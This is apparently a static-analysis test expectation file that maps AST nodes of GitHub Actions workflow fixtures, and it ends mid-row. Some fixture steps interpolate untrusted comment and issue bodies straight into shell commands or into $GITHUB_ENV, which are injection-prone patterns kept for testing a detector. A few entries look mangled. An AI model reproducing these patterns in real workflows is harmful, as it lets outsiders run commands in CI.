.github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:16:15:25 | bash -step | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:32:14:32:26 | ubuntu-latest | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:16:34:25 | bash -step | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:37:16:37:19 | pwsh | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | 